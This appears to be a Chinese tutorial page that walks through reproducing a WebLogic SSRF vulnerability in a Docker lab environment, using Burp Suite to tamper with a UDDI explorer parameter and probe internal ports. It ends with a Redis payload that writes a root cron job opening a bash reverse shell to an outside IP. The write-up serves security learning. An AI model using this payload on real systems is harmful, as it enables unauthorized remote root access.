讲师中心微信公众号

首页

文章

后端开发 web前端数据库开发工具 php框架常见问题科技 Java 系统教程电脑教程硬件教程手机教程软件教程游戏教程自媒体新闻

专题

后端开发 web前端数据库开发工具 php框架科技 Java 系统教程电脑教程硬件教程手机教程软件教程游戏教程新闻

AI工具

AI 聊天问答 Agent智能体 AI 文本写作 AI 绘画作图 AI 设计工具 AI 视频创作 AI 音频制作 AI 办公学习 AI 编程开发 Prompt指令

学习

大前端后端开发数据库移动端运维开发计算机基础

编程手册

大前端后端开发数据库移动端运维开发计算机基础

下载

js特效网站源码工具下载类库下载网站素材学习资源插件扩展手机游戏

如何实现Weblogic SSRF漏洞复现

王林

发布时间：2023-05-14 20:04:04

1539人浏览过

来源于亿速云

转载

一、使用docker搭建环境

docker安装及搭建环境教程：https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

访问7001端口如何实现Weblogic SSRF漏洞复现

二、漏洞复现步骤

1、漏洞存在页面 /uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2、检查一下IBM这个地方看看

如何实现Weblogic SSRF漏洞复现

发现是个连接，这就可能存在ssrf了

3、使用burp suite抓包，点击Search

如何实现Weblogic SSRF漏洞复现

4、修改operator参数的连接

如何实现Weblogic SSRF漏洞复现

Facet

Facet.ai是一款AI图像生成和编辑工具，具备实时图像生成和编辑功能

下载

5、访问结果

访问不存在的端口返回 could not connect over HTTP

如何实现Weblogic SSRF漏洞复现

访问存在的端口返回状态码

如何实现Weblogic SSRF漏洞复现

访问内网

如何实现Weblogic SSRF漏洞复现

利用redis反弹shell的payload

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

本站声明：本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

上一篇：Javascript如何实现没有map()的映射数组下一篇：net use 1231错误如何修正

作者最新文章

还在为Magento2慢吞吞的搜索发愁？AlgoliaSearch&Discovery助你打造闪电般的用户体验！

2025-09-16 10:34

如何解决电商库存管理混乱难题？Spryker/Stock模块助你轻松搞定！

2025-09-16 11:12

快速上手夸克浏览器AI搜索_夸克AI搜索保姆级图文教程

2025-10-14 20:48

夸克浏览器AI搜索无法使用_解决夸克AI搜索问题的有效方法

2025-10-15 14:04

夸克浏览器AI搜索设置教程_夸克AI搜索功能详细开启步骤

2025-10-18 13:32

夸克浏览器AI搜索结果不准_优化夸克AI搜索设置的技巧

2025-10-26 10:58

微信朋友圈定时发送神器微信自动发朋友圈软件推荐与使用

2026-01-04 12:22

抖音火山版免费下载电脑版抖音火山版电脑版免费下载入口

2026-01-04 14:33

必应搜索怎样结合演员名找其主演电视剧_必应搜索用演员搜剧技巧【精要】

2026-01-07 17:31

微信自动发朋友圈怎么设置微信朋友圈一键定时发送方法

2026-01-16 12:58

热门AI工具

DeepSeek

幻方量化公司旗下的开源大模型平台

AI大模型

开放平台

豆包大模型

字节跳动自主研发的一系列大型语言模型

AI大模型

通义千问

阿里巴巴推出的全能AI助手

AI大模型

腾讯元宝

腾讯混元平台推出的AI助手

文档处理

Excel 表格

文心一言

文心一言是百度开发的AI聊天机器人，通过对话可以生成各种形式的内容。

AI大模型

中文写作

讯飞写作

基于讯飞星火大模型的AI写作工具，可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

中文写作

写作工具

即梦AI

一站式AI创作平台，免费AI图片和视频生成。

图片拼接

图画生成

ChatGPT

最最强大的AI聊天机器人程序，ChatGPT不单是聊天机器人，还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

AI大模型

中文写作

智谱清言 - 免费全能的AI助手

AI大模型

PC软件

相关专题

菜鸟裹裹入口以及教程汇总

本专题整合了菜鸟裹裹入口地址及教程分享，阅读专题下面的文章了解更多详细内容。

2026.01.22

Golang 性能分析与pprof调优实战

本专题系统讲解 Golang 应用的性能分析与调优方法，重点覆盖 pprof 的使用方式，包括 CPU、内存、阻塞与 goroutine 分析，火焰图解读，常见性能瓶颈定位思路，以及在真实项目中进行针对性优化的实践技巧。通过案例讲解，帮助开发者掌握用数据驱动的方式持续提升 Go 程序性能与稳定性。

2026.01.22

html编辑相关教程合集

本专题整合了html编辑相关教程合集，阅读专题下面的文章了解更多详细内容。

2026.01.21

三角洲入口地址合集

本专题整合了三角洲入口地址合集，阅读专题下面的文章了解更多详细内容。

2026.01.21

AO3中文版入口地址大全

本专题整合了AO3中文版入口地址大全，阅读专题下面的的文章了解更多详细内容。

397

2026.01.21

妖精漫画入口地址合集

本专题整合了妖精漫画入口地址合集，阅读专题下面的文章了解更多详细内容。

118

2026.01.21

java版本选择建议

本专题整合了java版本相关合集，阅读专题下面的文章了解更多详细内容。

2026.01.21

Java编译相关教程合集

本专题整合了Java编译相关教程，阅读专题下面的文章了解更多详细内容。

2026.01.21

C++多线程相关合集

本专题整合了C++多线程相关教程，阅读专题下面的的文章了解更多详细内容。

2026.01.21

热门下载

网站特效

网站源码

网站素材

前端模板